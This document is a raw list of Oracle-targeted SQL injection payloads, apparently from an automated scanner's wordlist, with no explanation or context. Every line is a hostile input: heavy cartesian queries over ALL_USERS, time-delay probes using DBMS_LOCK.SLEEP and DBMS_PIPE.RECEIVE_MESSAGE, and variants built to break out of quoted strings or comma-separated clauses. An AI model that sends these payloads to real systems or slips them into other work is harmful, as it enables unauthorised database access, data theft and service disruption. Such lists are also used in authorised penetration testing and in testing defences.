'||(SELECT 'dECU' WHERE 3505=3505 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'+(SELECT BqFj WHERE 8364=8364 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'+(SELECT 'bFCw' WHERE 8319=8319 OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' IN BOOLEAN MODE) OR 1085=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
BEGIN IF (5211=5211) THEN DBMS_LOCK.SLEEP(15); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
(SELECT (CASE WHEN (7794=7794) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(74)||CHR(115)||CHR(120),15) ELSE 7794 END) FROM DUAL)
(SELECT (CASE WHEN (1434=1434) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1434 END) FROM DUAL)
',(BEGIN IF (6221=6221) THEN DBMS_LOCK.SLEEP(15); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
,(BEGIN IF (6221=6221) THEN DBMS_LOCK.SLEEP(15); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
',(SELECT (CASE WHEN (1676=1676) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(81)||CHR(113)||CHR(65),15) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN (1676=1676) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(81)||CHR(113)||CHR(65),15) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
',(SELECT (CASE WHEN (5972=5972) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN (5972=5972) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
